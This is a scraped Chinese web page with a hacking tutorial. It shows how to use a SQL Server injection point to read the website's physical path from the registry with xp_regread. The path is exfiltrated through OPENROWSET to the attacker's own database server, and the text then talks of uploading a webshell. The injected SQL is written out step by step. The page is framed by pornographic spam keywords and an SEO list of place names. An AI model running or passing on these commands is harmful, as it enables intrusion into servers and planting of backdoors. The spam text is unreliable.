人人做人人澡人人爽欧美,国产主播一区二区,久久久精品五月天,羞羞视频在线观看免费

當前位置:蘿卜系統 > 網絡技術教程 > 詳細頁面

突破SQL出錯提示上傳webshell

突破SQL出錯提示上傳webshell

更新時間:2021-04-26 文章作者:未知 信息來源:網絡 閱讀次數:

網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。
得到SQL注入點,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發現屏蔽了SQL錯誤信息,得不到物理路徑,那還寫個PP馬了.
聯想到一個權限不是很高的命令openrowset,進行跨庫服務器查詢,就是把一個SQL命令發送到遠程數據庫,然后看返回的結果,但是要啟動事件跟蹤!我們可以把網站信息寫入數據庫,然后%$^%$@#$@^%$~
首先在自己機器建立SQL數據庫

然后在對方機器上建立個表 create table [dbo].[fenggou]([cha8][char](255))--

在對方執行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

這樣fenggou這個表里就會有這樣一條記錄SELECT a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'SELECT * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用說,''D:\WEB"就是從注冊表里讀出的物理路徑拉.然后執行DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM fenggou) exec (@a1);--

等于執行了SELECT a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'SELECT * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,這時你在你機器上SQL事件追蹤器上就會顯示SELECT * FROM pubs.dbo.authors where au_fname='D:\WEB,,1'
哇 哈哈哈哈哈 物理路徑到手了 寫小馬傳大馬吧~
PS:如果出錯的話轉換為16進制試試哈.以上是在偶滲透失敗,無奈的時候想的辦法,也許高人早就知道了吧,笑過~


網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

網站地圖xml | 網站地圖html
主站蜘蛛池模板: 陕西省| 曲沃县| 常熟市| 芜湖县| 廉江市| 太仓市| 石家庄市| 丰顺县| 阿拉善左旗| 开远市| 兖州市| 哈尔滨市| 天门市| 田阳县| 剑阁县| 上栗县| 北票市| 兰溪市| 汽车| 台东县| 论坛| 凤山县| 旺苍县| 深州市| 永康市| 高平市| 大竹县| 沁源县| 邻水| 武冈市| 依安县| 平泉县| 通城县| 五寨县| 宁晋县| 金乡县| 新巴尔虎右旗| 淮滨县| 云南省| 辰溪县| 若羌县|